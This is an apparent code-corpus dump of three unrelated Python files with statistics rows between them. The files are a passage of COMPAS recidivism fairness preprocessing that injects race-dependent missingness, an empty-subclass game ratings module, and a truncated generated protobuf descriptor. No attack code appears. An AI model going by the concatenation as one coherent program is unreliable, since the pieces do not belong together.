{0.0: [0., 2.],
1.0: [2., 0.]},
index=[0.0, 1.0])
distort['race'] = pd.DataFrame(
{0.0: [0., 2.],
1.0: [2., 0.]},
index=[0.0, 1.0])
total_cost = 0.0
for k in vold:
if k in vnew:
total_cost += distort[k].loc[vnew[k], vold[k]]
return total_cost
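# Tiny worked example for the distortion function above (illustrative values):
# moving priors_count from 'More than 3' to '0' costs 2.0 and keeping age_cat
# at '25 to 45' costs 0.0, so the call returns 2.0.
def _example_distortion():
    vold = {'priors_count': 'More than 3', 'age_cat': '25 to 45'}
    vnew = {'priors_count': '0', 'age_cat': '25 to 45'}
    return get_distortion_compas_sel(vold, vnew)  # -> 2.0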
class CompasDataset_test(StandardDataset):
def __init__(
self,
label_name='two_year_recid',
favorable_classes=[0],
protected_attribute_names=[
'sex',
'race'],
privileged_classes=[
['Female'],
['Caucasian']],
instance_weights_name=None,
categorical_features=[
'age_cat',
'c_charge_degree',
'c_charge_desc'],
features_to_keep=[
'sex',
'age',
'age_cat',
'race',
'juv_fel_count',
'juv_misd_count',
'juv_other_count',
'priors_count',
'c_charge_degree',
'c_charge_desc',
'two_year_recid',
'length_of_stay'],
features_to_drop=[],
na_values=[],
custom_preprocessing=default_preprocessing,
metadata=default_mappings):
np.random.seed(1)
def quantizePrior1(x):
if x <= 0:
return 0
elif 1 <= x <= 3:
return 1
else:
return 2
        def quantizeLOS(x):
            if x <= 7:
                return 0
            elif x <= 93:  # was `8 < x <= 93`, which mis-binned a stay of exactly 8 days
                return 1
            else:
                return 2
def group_race(x):
if x == "Caucasian":
return 1.0
else:
return 0.0
filepath = 'data/compas/compas-test.csv'
df = pd.read_csv(filepath, index_col='id', na_values=[])
df['age_cat'] = df['age_cat'].replace('Greater than 45', 2)
df['age_cat'] = df['age_cat'].replace('25 - 45', 1)
df['age_cat'] = df['age_cat'].replace('Less than 25', 0)
df['score_text'] = df['score_text'].replace('High', 1)
df['score_text'] = df['score_text'].replace('Medium', 1)
df['score_text'] = df['score_text'].replace('Low', 0)
df['priors_count'] = df['priors_count'].apply(
lambda x: quantizePrior1(x))
df['length_of_stay'] = (pd.to_datetime(df['c_jail_out']) -
pd.to_datetime(df['c_jail_in'])).apply(
lambda x: x.days)
df['length_of_stay'] = df['length_of_stay'].apply(
lambda x: quantizeLOS(x))
df = df.loc[~df['race'].isin(
['Native American', 'Hispanic', 'Asian', 'Other']), :]
        # Recode charge degree to numeric and back; as above, the round trip
        # is a no-op kept for parity with the train split.
        df['c_charge_degree'] = df['c_charge_degree'].replace({'F': 0, 'M': 1})
        # _, df = train_test_split(df, test_size=4000, random_state=1)
        df['c_charge_degree'] = df['c_charge_degree'].replace({0: 'F', 1: 'M'})
        super(CompasDataset_test, self).__init__(
            df=df,
            label_name=label_name,
            favorable_classes=favorable_classes,
            protected_attribute_names=protected_attribute_names,
            privileged_classes=privileged_classes,
            instance_weights_name=instance_weights_name,
            categorical_features=categorical_features,
            features_to_keep=features_to_keep,
            features_to_drop=features_to_drop,
            na_values=na_values,
            custom_preprocessing=custom_preprocessing,
            metadata=metadata)
def load_preproc_data_compas_test(protected_attributes=None):
def custom_preprocessing(df):
df = df[['age',
'c_charge_degree',
'race',
'age_cat',
'score_text',
'sex',
'priors_count',
'days_b_screening_arrest',
'decile_score',
'is_recid',
'two_year_recid',
'length_of_stay']]
# Indices of data samples to keep
ix = df['days_b_screening_arrest'] <= 30
ix = (df['days_b_screening_arrest'] >= -30) & ix
ix = (df['is_recid'] != -1) & ix
ix = (df['c_charge_degree'] != "O") & ix
ix = (df['score_text'] != 'N/A') & ix
df = df.loc[ix, :]
# Restrict races to African-American and Caucasian
dfcut = df.loc[~df['race'].isin(
['Native American', 'Hispanic', 'Asian', 'Other']), :]
# Restrict the features to use
dfcutQ = dfcut[['sex',
'race',
'age_cat',
'c_charge_degree',
'score_text',
'priors_count',
'is_recid',
'two_year_recid',
'length_of_stay']].copy()
# Quantize priors count between 0, 1-3, and >3
def quantizePrior(x):
if x == 0:
return '0'
elif x == 1:
return '1 to 3'
elif x == 2:
return 'More than 3'
else:
return 'missing'
# Quantize length of stay
        def quantizeLOS(x):
            if x == 0:
                return '<week'
            elif x == 1:
                return '<3months'
            else:
                return '>3 months'
        # Map the numeric age_cat codes back to their category labels
def adjustAge(x):
if x == 1:
return '25 to 45'
elif x == 2:
return 'Greater than 45'
elif x == 0:
return 'Less than 25'
# Quantize score_text to MediumHigh
def quantizeScore(x):
if x == 1:
return 'MediumHigh'
else:
return 'Low'
def group_race(x):
if x == "Caucasian":
return 1.0
else:
return 0.0
dfcutQ['priors_count'] = dfcutQ['priors_count'].apply(
lambda x: quantizePrior(x))
dfcutQ['length_of_stay'] = dfcutQ['length_of_stay'].apply(
lambda x: quantizeLOS(x))
dfcutQ['score_text'] = dfcutQ['score_text'].apply(
lambda x: quantizeScore(x))
dfcutQ['age_cat'] = dfcutQ['age_cat'].apply(lambda x: adjustAge(x))
# Recode sex and race
dfcutQ['sex'] = dfcutQ['sex'].replace({'Female': 1.0, 'Male': 0.0})
dfcutQ['race'] = dfcutQ['race'].apply(lambda x: group_race(x))
features = ['two_year_recid', 'race',
'age_cat', 'priors_count', 'c_charge_degree', 'score_text']
        # Pass the selected features to df
df = dfcutQ[features]
return df
XD_features = [
'age_cat',
'c_charge_degree',
'priors_count',
'race',
'score_text']
    D_features = ['race'] if protected_attributes is None else protected_attributes
Y_features = ['two_year_recid']
X_features = list(set(XD_features) - set(D_features))
categorical_features = [
'age_cat',
'priors_count',
'c_charge_degree',
'score_text']
# privileged classes
all_privileged_classes = {"sex": [1.0],
"race": [1.0]}
# protected attribute maps
    all_protected_attribute_maps = {
        "sex": {0.0: 'Male', 1.0: 'Female'},
        "race": {1.0: 'Caucasian', 0.0: 'Not Caucasian'}}
return CompasDataset_test(
label_name=Y_features[0],
favorable_classes=[0],
protected_attribute_names=D_features,
privileged_classes=[all_privileged_classes[x] for x in D_features],
instance_weights_name=None,
categorical_features=categorical_features,
features_to_keep=X_features + Y_features + D_features,
na_values=[],
metadata={'label_maps': [{1.0: 'Did recid.', 0.0: 'No recid.'}],
'protected_attribute_maps': [all_protected_attribute_maps[x]
for x in D_features]},
custom_preprocessing=custom_preprocessing)
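# Hedged usage sketch: load the preprocessed test split (requires the
# hard-coded data/compas/compas-test.csv to exist) and report disparate
# impact for the race groups this file defines.
def _example_load_test_split():
    dataset = load_preproc_data_compas_test(['race'])
    metric = BinaryLabelDatasetMetric(
        dataset,
        unprivileged_groups=[{'race': 0.0}],
        privileged_groups=[{'race': 1.0}])
    return metric.disparate_impact()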
class CompasDataset_train(StandardDataset):
def __init__(
self,
label_name='two_year_recid',
favorable_classes=[0],
protected_attribute_names=[
'sex',
'race'],
privileged_classes=[
['Female'],
['Caucasian']],
instance_weights_name=None,
categorical_features=[
'age_cat',
'c_charge_degree',
'c_charge_desc'],
features_to_keep=[
'sex',
'age',
'age_cat',
'race',
'juv_fel_count',
'juv_misd_count',
'juv_other_count',
'priors_count',
'c_charge_degree',
'c_charge_desc',
'two_year_recid',
'length_of_stay'],
features_to_drop=[],
na_values=[],
custom_preprocessing=default_preprocessing,
metadata=default_mappings):
np.random.seed(1)
def quantizePrior1(x):
if x <= 0:
return 0
elif 1 <= x <= 3:
return 1
else:
return 2
        def quantizeLOS(x):
            if x <= 7:
                return 0
            elif x <= 93:  # was `8 < x <= 93`, which mis-binned a stay of exactly 8 days
                return 1
            else:
                return 2
def group_race(x):
if x == "Caucasian":
return 1.0
else:
return 0.0
filepath = 'data/compas/compas-train.csv'
df = pd.read_csv(filepath, index_col='id', na_values=[])
df['age_cat'] = df['age_cat'].replace('Greater than 45', 2)
df['age_cat'] = df['age_cat'].replace('25 - 45', 1)
df['age_cat'] = df['age_cat'].replace('Less than 25', 0)
df['score_text'] = df['score_text'].replace('High', 1)
df['score_text'] = df['score_text'].replace('Medium', 1)
df['score_text'] = df['score_text'].replace('Low', 0)
df['priors_count'] = df['priors_count'].apply(
lambda x: quantizePrior1(x))
df['length_of_stay'] = (pd.to_datetime(df['c_jail_out']) -
pd.to_datetime(df['c_jail_in'])).apply(
lambda x: x.days)
df['length_of_stay'] = df['length_of_stay'].apply(
lambda x: quantizeLOS(x))
df = df.loc[~df['race'].isin(
['Native American', 'Hispanic', 'Asian', 'Other']), :]
        df['c_charge_degree'] = df['c_charge_degree'].replace({'F': 0, 'M': 1})
        ix = df['days_b_screening_arrest'] <= 30
        ix = (df['days_b_screening_arrest'] >= -30) & ix
        ix = (df['is_recid'] != -1) & ix
        # Note: c_charge_degree is already numeric at this point, so the "O"
        # check below can no longer match anything; it is kept from the
        # original recipe, where it runs on the raw charge codes.
        ix = (df['c_charge_degree'] != "O") & ix
        ix = (df['score_text'] != 'N/A') & ix
        df = df.loc[ix, :]
        df['c_charge_degree'] = df['c_charge_degree'].replace({0: 'F', 1: 'M'})
        super(CompasDataset_train, self).__init__(
            df=df,
            label_name=label_name,
            favorable_classes=favorable_classes,
            protected_attribute_names=protected_attribute_names,
            privileged_classes=privileged_classes,
            instance_weights_name=instance_weights_name,
            categorical_features=categorical_features,
            features_to_keep=features_to_keep,
            features_to_drop=features_to_drop,
            na_values=na_values,
            custom_preprocessing=custom_preprocessing,
            metadata=metadata)
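# Hedged sketch: instantiate the train-split wrapper defined above (requires
# the hard-coded data/compas/compas-train.csv) and inspect its feature matrix.
def _example_train_dataset():
    ds = CompasDataset_train()
    return ds.features.shape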
def load_preproc_data_compas_test_comb(protected_attributes=None):
def custom_preprocessing(df):
"""The custom pre-processing function is adapted from
https://github.com/fair-preprocessing/nips2017/blob/master/compas/code/Generate_Compas_Data.ipynb
"""
df = df[['age',
'c_charge_degree',
'race',
'age_cat',
'score_text',
'sex',
'priors_count',
'days_b_screening_arrest',
'decile_score',
'is_recid',
'two_year_recid',
'length_of_stay']]
# Indices of data samples to keep
ix = df['days_b_screening_arrest'] <= 30
ix = (df['days_b_screening_arrest'] >= -30) & ix
ix = (df['is_recid'] != -1) & ix
ix = (df['c_charge_degree'] != "O") & ix
ix = (df['score_text'] != 'N/A') & ix
df = df.loc[ix, :]
# Restrict races to African-American and Caucasian
dfcut = df.loc[~df['race'].isin(
['Native American', 'Hispanic', 'Asian', 'Other']), :]
# Restrict the features to use
dfcutQ = dfcut[['sex',
'race',
'age_cat',
'c_charge_degree',
'score_text',
'priors_count',
'is_recid',
'two_year_recid',
'length_of_stay']].copy()
# Quantize priors count between 0, 1-3, and >3
def quantizePrior(x):
if x == 0:
return '0'
elif x == 1:
return '1 to 3'
elif x == 2:
return 'More than 3'
else:
return 'missing'
# Quantize length of stay
        def quantizeLOS(x):
            if x == 0:
                return '<week'
            elif x == 1:
                return '<3months'
            else:
                return '>3 months'
        # Map the numeric age_cat codes back to their category labels
def adjustAge(x):
if x == 1:
return '25 to 45'
elif x == 2:
return 'Greater than 45'
elif x == 0:
return 'Less than 25'
# Quantize score_text to MediumHigh
def quantizeScore(x):
if x == 1:
return 'MediumHigh'
else:
return 'Low'
def group_race(x):
if x == "Caucasian":
return 1.0
else:
return 0.0
dfcutQ['priors_count'] = dfcutQ['priors_count'].apply(
lambda x: quantizePrior(x))
dfcutQ['length_of_stay'] = dfcutQ['length_of_stay'].apply(
lambda x: quantizeLOS(x))
dfcutQ['score_text'] = dfcutQ['score_text'].apply(
lambda x: quantizeScore(x))
dfcutQ['age_cat'] = dfcutQ['age_cat'].apply(lambda x: adjustAge(x))
# Recode sex and race
dfcutQ['sex'] = dfcutQ['sex'].replace({'Female': 1.0, 'Male': 0.0})
dfcutQ['race'] = dfcutQ['race'].apply(lambda x: group_race(x))
features = ['two_year_recid', 'race',
'age_cat', 'priors_count', 'c_charge_degree', 'score_text']
        # Pass the selected features to df (copy, to avoid chained-assignment
        # warnings when adding columns below)
        df = dfcutQ[features].copy()
        # Label-dependent missingness probabilities. race was recoded by
        # group_race above (1.0 = Caucasian, 0.0 = African-American after the
        # earlier race restriction), so the original string comparison against
        # 'African-American' could never match; compare the codes instead.
        df['mis_prob'] = 0.05  # African-American rows
        df.loc[(df['race'] == 1.0) & (df['two_year_recid'] == 0),
               'mis_prob'] = 0.3
        df.loc[(df['race'] == 1.0) & (df['two_year_recid'] != 0),
               'mis_prob'] = 0.1
        # Inject 'missing' into priors_count with each row's own Bernoulli rate.
        new_label = []
        for index, row in df.iterrows():
            if np.random.binomial(1, float(row['mis_prob']), 1)[0] == 1:
                new_label.append('missing')
            else:
                new_label.append(row['priors_count'])
        df['priors_count'] = new_label
return df
XD_features = [
'age_cat',
'c_charge_degree',
'priors_count',
'race',
'score_text']
    D_features = ['race'] if protected_attributes is None else protected_attributes
Y_features = ['two_year_recid']
X_features = list(set(XD_features) - set(D_features))
categorical_features = [
'age_cat',
'priors_count',
'c_charge_degree',
'score_text']
# privileged classes
all_privileged_classes = {"sex": [1.0],
"race": [1.0]}
# protected attribute maps
    all_protected_attribute_maps = {
        "sex": {0.0: 'Male', 1.0: 'Female'},
        "race": {1.0: 'Caucasian', 0.0: 'Not Caucasian'}}
return CompasDataset_test(
label_name=Y_features[0],
favorable_classes=[0],
protected_attribute_names=D_features,
privileged_classes=[all_privileged_classes[x] for x in D_features],
instance_weights_name=None,
categorical_features=categorical_features,
features_to_keep=X_features + Y_features + D_features,
na_values=[],
metadata={'label_maps': [{1.0: 'Did recid.', 0.0: 'No recid.'}],
'protected_attribute_maps': [all_protected_attribute_maps[x]
for x in D_features]},
custom_preprocessing=custom_preprocessing)
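# Standalone sketch of the missingness mechanism used in
# load_preproc_data_compas_test_comb: each value is replaced by 'missing'
# with its own Bernoulli rate. `values` and `probs` here are hypothetical
# inputs, chosen so the doctest is deterministic.
def _example_missingness_injection(values, probs, seed=0):
    """
    >>> _example_missingness_injection(['0', '1 to 3'], [1.0, 0.0])
    ['missing', '1 to 3']
    """
    rng = np.random.RandomState(seed)
    return ['missing' if rng.binomial(1, p) == 1 else v
            for v, p in zip(values, probs)]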
| 34.978882
| 139
| 0.517118
| 3,219
| 28,158
| 4.278347
| 0.097856
| 0.017427
| 0.032094
| 0.017427
| 0.86763
| 0.851873
| 0.836407
| 0.820505
| 0.817746
| 0.812373
| 0
| 0.027385
| 0.350273
| 28,158
| 805
| 140
| 34.978882
| 0.725389
| 0.07259
| 0
| 0.854294
| 0
| 0
| 0.169803
| 0.013495
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047546
| false
| 0
| 0.021472
| 0
| 0.165644
| 0.018405
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cec85725b51c39f0e02e3adaa7d333b95766f6c6
| 6,545
|
py
|
Python
|
loldib/getratings/models/NA/na_draven/na_draven_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_draven/na_draven_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_draven/na_draven_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Draven_Sup_Aatrox(Ratings):
pass
class NA_Draven_Sup_Ahri(Ratings):
pass
class NA_Draven_Sup_Akali(Ratings):
pass
class NA_Draven_Sup_Alistar(Ratings):
pass
class NA_Draven_Sup_Amumu(Ratings):
pass
class NA_Draven_Sup_Anivia(Ratings):
pass
class NA_Draven_Sup_Annie(Ratings):
pass
class NA_Draven_Sup_Ashe(Ratings):
pass
class NA_Draven_Sup_AurelionSol(Ratings):
pass
class NA_Draven_Sup_Azir(Ratings):
pass
class NA_Draven_Sup_Bard(Ratings):
pass
class NA_Draven_Sup_Blitzcrank(Ratings):
pass
class NA_Draven_Sup_Brand(Ratings):
pass
class NA_Draven_Sup_Braum(Ratings):
pass
class NA_Draven_Sup_Caitlyn(Ratings):
pass
class NA_Draven_Sup_Camille(Ratings):
pass
class NA_Draven_Sup_Cassiopeia(Ratings):
pass
class NA_Draven_Sup_Chogath(Ratings):
pass
class NA_Draven_Sup_Corki(Ratings):
pass
class NA_Draven_Sup_Darius(Ratings):
pass
class NA_Draven_Sup_Diana(Ratings):
pass
class NA_Draven_Sup_Draven(Ratings):
pass
class NA_Draven_Sup_DrMundo(Ratings):
pass
class NA_Draven_Sup_Ekko(Ratings):
pass
class NA_Draven_Sup_Elise(Ratings):
pass
class NA_Draven_Sup_Evelynn(Ratings):
pass
class NA_Draven_Sup_Ezreal(Ratings):
pass
class NA_Draven_Sup_Fiddlesticks(Ratings):
pass
class NA_Draven_Sup_Fiora(Ratings):
pass
class NA_Draven_Sup_Fizz(Ratings):
pass
class NA_Draven_Sup_Galio(Ratings):
pass
class NA_Draven_Sup_Gangplank(Ratings):
pass
class NA_Draven_Sup_Garen(Ratings):
pass
class NA_Draven_Sup_Gnar(Ratings):
pass
class NA_Draven_Sup_Gragas(Ratings):
pass
class NA_Draven_Sup_Graves(Ratings):
pass
class NA_Draven_Sup_Hecarim(Ratings):
pass
class NA_Draven_Sup_Heimerdinger(Ratings):
pass
class NA_Draven_Sup_Illaoi(Ratings):
pass
class NA_Draven_Sup_Irelia(Ratings):
pass
class NA_Draven_Sup_Ivern(Ratings):
pass
class NA_Draven_Sup_Janna(Ratings):
pass
class NA_Draven_Sup_JarvanIV(Ratings):
pass
class NA_Draven_Sup_Jax(Ratings):
pass
class NA_Draven_Sup_Jayce(Ratings):
pass
class NA_Draven_Sup_Jhin(Ratings):
pass
class NA_Draven_Sup_Jinx(Ratings):
pass
class NA_Draven_Sup_Kalista(Ratings):
pass
class NA_Draven_Sup_Karma(Ratings):
pass
class NA_Draven_Sup_Karthus(Ratings):
pass
class NA_Draven_Sup_Kassadin(Ratings):
pass
class NA_Draven_Sup_Katarina(Ratings):
pass
class NA_Draven_Sup_Kayle(Ratings):
pass
class NA_Draven_Sup_Kayn(Ratings):
pass
class NA_Draven_Sup_Kennen(Ratings):
pass
class NA_Draven_Sup_Khazix(Ratings):
pass
class NA_Draven_Sup_Kindred(Ratings):
pass
class NA_Draven_Sup_Kled(Ratings):
pass
class NA_Draven_Sup_KogMaw(Ratings):
pass
class NA_Draven_Sup_Leblanc(Ratings):
pass
class NA_Draven_Sup_LeeSin(Ratings):
pass
class NA_Draven_Sup_Leona(Ratings):
pass
class NA_Draven_Sup_Lissandra(Ratings):
pass
class NA_Draven_Sup_Lucian(Ratings):
pass
class NA_Draven_Sup_Lulu(Ratings):
pass
class NA_Draven_Sup_Lux(Ratings):
pass
class NA_Draven_Sup_Malphite(Ratings):
pass
class NA_Draven_Sup_Malzahar(Ratings):
pass
class NA_Draven_Sup_Maokai(Ratings):
pass
class NA_Draven_Sup_MasterYi(Ratings):
pass
class NA_Draven_Sup_MissFortune(Ratings):
pass
class NA_Draven_Sup_MonkeyKing(Ratings):
pass
class NA_Draven_Sup_Mordekaiser(Ratings):
pass
class NA_Draven_Sup_Morgana(Ratings):
pass
class NA_Draven_Sup_Nami(Ratings):
pass
class NA_Draven_Sup_Nasus(Ratings):
pass
class NA_Draven_Sup_Nautilus(Ratings):
pass
class NA_Draven_Sup_Nidalee(Ratings):
pass
class NA_Draven_Sup_Nocturne(Ratings):
pass
class NA_Draven_Sup_Nunu(Ratings):
pass
class NA_Draven_Sup_Olaf(Ratings):
pass
class NA_Draven_Sup_Orianna(Ratings):
pass
class NA_Draven_Sup_Ornn(Ratings):
pass
class NA_Draven_Sup_Pantheon(Ratings):
pass
class NA_Draven_Sup_Poppy(Ratings):
pass
class NA_Draven_Sup_Quinn(Ratings):
pass
class NA_Draven_Sup_Rakan(Ratings):
pass
class NA_Draven_Sup_Rammus(Ratings):
pass
class NA_Draven_Sup_RekSai(Ratings):
pass
class NA_Draven_Sup_Renekton(Ratings):
pass
class NA_Draven_Sup_Rengar(Ratings):
pass
class NA_Draven_Sup_Riven(Ratings):
pass
class NA_Draven_Sup_Rumble(Ratings):
pass
class NA_Draven_Sup_Ryze(Ratings):
pass
class NA_Draven_Sup_Sejuani(Ratings):
pass
class NA_Draven_Sup_Shaco(Ratings):
pass
class NA_Draven_Sup_Shen(Ratings):
pass
class NA_Draven_Sup_Shyvana(Ratings):
pass
class NA_Draven_Sup_Singed(Ratings):
pass
class NA_Draven_Sup_Sion(Ratings):
pass
class NA_Draven_Sup_Sivir(Ratings):
pass
class NA_Draven_Sup_Skarner(Ratings):
pass
class NA_Draven_Sup_Sona(Ratings):
pass
class NA_Draven_Sup_Soraka(Ratings):
pass
class NA_Draven_Sup_Swain(Ratings):
pass
class NA_Draven_Sup_Syndra(Ratings):
pass
class NA_Draven_Sup_TahmKench(Ratings):
pass
class NA_Draven_Sup_Taliyah(Ratings):
pass
class NA_Draven_Sup_Talon(Ratings):
pass
class NA_Draven_Sup_Taric(Ratings):
pass
class NA_Draven_Sup_Teemo(Ratings):
pass
class NA_Draven_Sup_Thresh(Ratings):
pass
class NA_Draven_Sup_Tristana(Ratings):
pass
class NA_Draven_Sup_Trundle(Ratings):
pass
class NA_Draven_Sup_Tryndamere(Ratings):
pass
class NA_Draven_Sup_TwistedFate(Ratings):
pass
class NA_Draven_Sup_Twitch(Ratings):
pass
class NA_Draven_Sup_Udyr(Ratings):
pass
class NA_Draven_Sup_Urgot(Ratings):
pass
class NA_Draven_Sup_Varus(Ratings):
pass
class NA_Draven_Sup_Vayne(Ratings):
pass
class NA_Draven_Sup_Veigar(Ratings):
pass
class NA_Draven_Sup_Velkoz(Ratings):
pass
class NA_Draven_Sup_Vi(Ratings):
pass
class NA_Draven_Sup_Viktor(Ratings):
pass
class NA_Draven_Sup_Vladimir(Ratings):
pass
class NA_Draven_Sup_Volibear(Ratings):
pass
class NA_Draven_Sup_Warwick(Ratings):
pass
class NA_Draven_Sup_Xayah(Ratings):
pass
class NA_Draven_Sup_Xerath(Ratings):
pass
class NA_Draven_Sup_XinZhao(Ratings):
pass
class NA_Draven_Sup_Yasuo(Ratings):
pass
class NA_Draven_Sup_Yorick(Ratings):
pass
class NA_Draven_Sup_Zac(Ratings):
pass
class NA_Draven_Sup_Zed(Ratings):
pass
class NA_Draven_Sup_Ziggs(Ratings):
pass
class NA_Draven_Sup_Zilean(Ratings):
pass
class NA_Draven_Sup_Zyra(Ratings):
pass
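# The classes above are one empty Ratings subclass per champion. A hedged
# alternative sketch (purely illustrative; this module spells the classes out
# explicitly) builds the same classes from a roster list with type():
def _generate_rating_classes(names, prefix='NA_Draven_Sup_'):
    return {prefix + n: type(prefix + n, (Ratings,), {}) for n in names}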
| 15.695444
| 46
| 0.766692
| 972
| 6,545
| 4.736626
| 0.151235
| 0.209818
| 0.389661
| 0.479583
| 0.803432
| 0.803432
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169748
| 6,545
| 416
| 47
| 15.733173
| 0.847258
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
0c8f929d737e1e8e3a837b837e215df8c9a40961
| 43,557
|
py
|
Python
|
venv/lib/python3.8/site-packages/spaceone/api/power_scheduler/v1/controller_pb2.py
|
choonho/plugin-prometheus-mon-webhook
|
afa7d65d12715fd0480fb4f92a9c62da2d6128e0
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.8/site-packages/spaceone/api/power_scheduler/v1/controller_pb2.py
|
choonho/plugin-prometheus-mon-webhook
|
afa7d65d12715fd0480fb4f92a9c62da2d6128e0
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.8/site-packages/spaceone/api/power_scheduler/v1/controller_pb2.py
|
choonho/plugin-prometheus-mon-webhook
|
afa7d65d12715fd0480fb4f92a9c62da2d6128e0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: spaceone/api/power_scheduler/v1/controller.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from spaceone.api.core.v1 import query_pb2 as spaceone_dot_api_dot_core_dot_v1_dot_query__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='spaceone/api/power_scheduler/v1/controller.proto',
package='spaceone.api.power_scheduler.v1',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n0spaceone/api/power_scheduler/v1/controller.proto\x12\x1fspaceone.api.power_scheduler.v1\x1a\x1bgoogle/protobuf/empty.proto\x1a\x1cgoogle/protobuf/struct.proto\x1a\x1cgoogle/api/annotations.proto\x1a spaceone/api/core/v1/query.proto\"\x97\x01\n\nPluginInfo\x12\x11\n\tplugin_id\x18\x01 \x01(\t\x12\x0f\n\x07version\x18\x02 \x01(\t\x12(\n\x07options\x18\x03 \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x10\n\x08provider\x18\x04 \x01(\t\x12)\n\x08metadata\x18\n \x01(\x0b\x32\x17.google.protobuf.Struct\"\xa3\x01\n\x17\x43reateControllerRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12@\n\x0bplugin_info\x18\x02 \x01(\x0b\x32+.spaceone.api.power_scheduler.v1.PluginInfo\x12%\n\x04tags\x18\x0b \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x11\n\tdomain_id\x18\x16 \x01(\t\"\xba\x01\n\x17UpdateControllerRequest\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12@\n\x0bplugin_info\x18\x03 \x01(\x0b\x32+.spaceone.api.power_scheduler.v1.PluginInfo\x12%\n\x04tags\x18\x0b \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x11\n\tdomain_id\x18\x16 \x01(\t\"=\n\x11\x43ontrollerRequest\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\x11\n\tdomain_id\x18\x02 \x01(\t\"N\n\x14GetControllerRequest\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\x11\n\tdomain_id\x18\x02 \x01(\t\x12\x0c\n\x04only\x18\x03 \x03(\t\"u\n\x0f\x43ontrollerQuery\x12*\n\x05query\x18\x01 \x01(\x0b\x32\x1b.spaceone.api.core.v1.Query\x12\x15\n\rcontroller_id\x18\x02 \x01(\t\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x11\n\tdomain_id\x18\x04 \x01(\t\"\x84\x02\n\x0e\x43ontrollerInfo\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x10\n\x08provider\x18\x03 \x01(\t\x12+\n\ncapability\x18\x04 \x01(\x0b\x32\x17.google.protobuf.Struct\x12@\n\x0bplugin_info\x18\x05 \x01(\x0b\x32+.spaceone.api.power_scheduler.v1.PluginInfo\x12%\n\x04tags\x18\x06 \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x12\n\ncreated_at\x18\x07 \x01(\t\x12\x11\n\tdomain_id\x18\n \x01(\t\"h\n\x0f\x43ontrollersInfo\x12@\n\x07results\x18\x01 \x03(\x0b\x32/.spaceone.api.power_scheduler.v1.ControllerInfo\x12\x13\n\x0btotal_count\x18\x02 \x01(\x05\"^\n\x13\x43ontrollerStatQuery\x12\x34\n\x05query\x18\x01 \x01(\x0b\x32%.spaceone.api.core.v1.StatisticsQuery\x12\x11\n\tdomain_id\x18\x02 \x01(\t\"\x89\x01\n\x0e\x43ontrolRequest\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\'\n\x06\x66ilter\x18\x02 \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x11\n\tsecret_id\x18\x03 \x01(\t\x12\x11\n\tdomain_id\x18\x04 \x01(\t\x12\x11\n\tuse_cache\x18\x05 \x01(\x08\"z\n\x13UpdatePluginRequest\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\x0f\n\x07version\x18\x02 \x01(\t\x12(\n\x07options\x18\x03 \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x11\n\tdomain_id\x18\x04 \x01(\t\"R\n\x13VerifyPluginRequest\x12\x15\n\rcontroller_id\x18\x01 \x01(\t\x12\x11\n\tsecret_id\x18\x02 \x01(\t\x12\x11\n\tdomain_id\x18\x03 
